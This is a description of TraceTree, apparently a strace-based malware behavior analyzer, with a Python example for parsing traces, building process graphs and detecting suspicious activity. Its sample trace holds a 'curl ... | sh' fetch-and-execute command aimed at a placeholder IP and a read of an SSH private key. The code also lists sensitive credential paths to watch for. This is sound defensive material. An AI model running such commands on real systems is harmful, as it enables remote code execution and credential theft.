TraceTree
TraceTree - Runtime behavioral analysis tool that maps the process cascade
TraceTree monitors what software actually does when it runs, not just what it claims to be. It sandboxes packages inside Docker, attaches strace to capture every syscall, and builds a directed graph of the full process cascade: every file touched, every network call made, every child process spawned. That graph gets fed into a RandomForest classifier trained on real malware samples, plus YARA rules and n-gram syscall pattern matching, to flag behavioral signatures that static scanners and...
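The pipeline above (strace capture, process-cascade graph, n-gram syscall features) is easier to see on concrete input. The following is an added example written for this page, not TraceTree's own code: it parses a small constructed `strace -f -o` style trace (pid column, one syscall per line), builds a directed graph of spawn/exec/open/connect edges, derives per-process syscall trigrams, and runs one illustrative behavioral check (a sensitive file read plus outbound connection anywhere in the same process tree). The regexes, the sensitive-path list and the `behavioral_findings` heuristic are assumptions for illustration; they are not TraceTree's rules or YARA signatures.

```python
import re
from collections import Counter, defaultdict

# Constructed sample in the format strace -f -o <file> writes (pid, call, "= ret").
# Not captured from a real run; the "installer" spawns a shell that curls a host
# and reads an SSH key.
SAMPLE_TRACE = """\
1000  execve("/usr/bin/node", ["node", "install.js"], 0x7ffd) = 0
1000  openat(AT_FDCWD, "/app/package.json", O_RDONLY|O_CLOEXEC) = 3
1000  clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|SIGCHLD, child_tidptr=0x7f1) = 1001
1001  execve("/bin/sh", ["sh", "-c", "curl http://203.0.113.5/x | sh"], 0x55) = 0
1001  clone(child_stack=NULL, flags=SIGCHLD, child_tidptr=0x7f2) = 1002
1002  execve("/usr/bin/curl", ["curl", "http://203.0.113.5/x"], 0x55) = 0
1002  socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
1002  connect(4, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("203.0.113.5")}, 16) = 0
1001  openat(AT_FDCWD, "/home/user/.ssh/id_rsa", O_RDONLY) = 5
1001  read(5, "-----BEGIN"..., 4096) = 1823
1000  exit_group(0) = ?
"""

# Accepts both "1000  call(...)" (strace -o) and "[pid 1000] call(...)" (strace to a tty).
LINE_RE = re.compile(
    r'^(?:\[pid\s+)?(?P<pid>\d+)\]?\s+(?P<call>\w+)\((?P<args>.*)\)\s*=\s*(?P<ret>\S+)')
PATH_RE = re.compile(r'"([^"]*)"')                    # first quoted string = path
IP_RE = re.compile(r'sin_port=htons\((\d+)\).*inet_addr\("([^"]+)"\)')
SENSITIVE_PREFIXES = ("/home/user/.ssh/", "/etc/shadow", "/root/.ssh/")  # assumed list


def parse_trace(text):
    """Return a list of (pid, syscall, raw_args, return_value); skip non-syscall lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((int(m['pid']), m['call'], m['args'], m['ret']))
    return events


def build_graph(events):
    """Directed graph as a set of (src, label, dst) edges; nodes are pid:/exe:/file:/net: strings."""
    edges = set()
    for pid, call, args, ret in events:
        proc = f"pid:{pid}"
        if call in ("clone", "fork", "vfork") and ret.isdigit():
            edges.add((proc, "spawns", f"pid:{ret}"))
        elif call == "execve":
            path = PATH_RE.search(args)
            if path:
                edges.add((proc, "execs", f"exe:{path.group(1)}"))
        elif call in ("open", "openat", "creat"):
            path = PATH_RE.search(args)
            if path:
                edges.add((proc, "opens", f"file:{path.group(1)}"))
        elif call == "connect":
            m = IP_RE.search(args)
            if m:
                edges.add((proc, "connects", f"net:{m.group(2)}:{m.group(1)}"))
    return edges


def descendants(edges, root):
    """All pid nodes reachable from root via 'spawns' edges (the process cascade)."""
    children = defaultdict(set)
    for src, label, dst in edges:
        if label == "spawns":
            children[src].add(dst)
    seen, stack = set(), [root]
    while stack:
        node = stack.pop()
        for child in children[node]:
            if child not in seen:
                seen.add(child)
                stack.append(child)
    return seen


def syscall_ngrams(events, n=3):
    """Counter of syscall-name n-grams, computed per process so sequences don't interleave."""
    per_pid = defaultdict(list)
    for pid, call, _, _ in events:
        per_pid[pid].append(call)
    counts = Counter()
    for seq in per_pid.values():
        for i in range(len(seq) - n + 1):
            counts[tuple(seq[i:i + n])] += 1
    return counts


def behavioral_findings(edges, root):
    """Illustrative heuristic (not TraceTree's): sensitive read + egress within one process tree."""
    tree = descendants(edges, root) | {root}
    reads = sorted(dst[5:] for src, label, dst in edges
                   if src in tree and label == "opens" and dst[5:].startswith(SENSITIVE_PREFIXES))
    egress = sorted(dst[4:] for src, label, dst in edges if src in tree and label == "connects")
    return {"sensitive_reads": reads, "egress": egress, "suspicious": bool(reads and egress)}


if __name__ == "__main__":
    ev = parse_trace(SAMPLE_TRACE)
    g = build_graph(ev)
    for e in sorted(g):
        print(" -> ".join(e))
    print(syscall_ngrams(ev).most_common(3))
    print(behavioral_findings(g, "pid:1000"))
```

Per-process n-gram sequences are the right unit here: a trigram such as `execve, socket, connect` describes one process's behaviour, whereas a window over the interleaved `-f` output would mix syscalls from unrelated pids and dilute the signal.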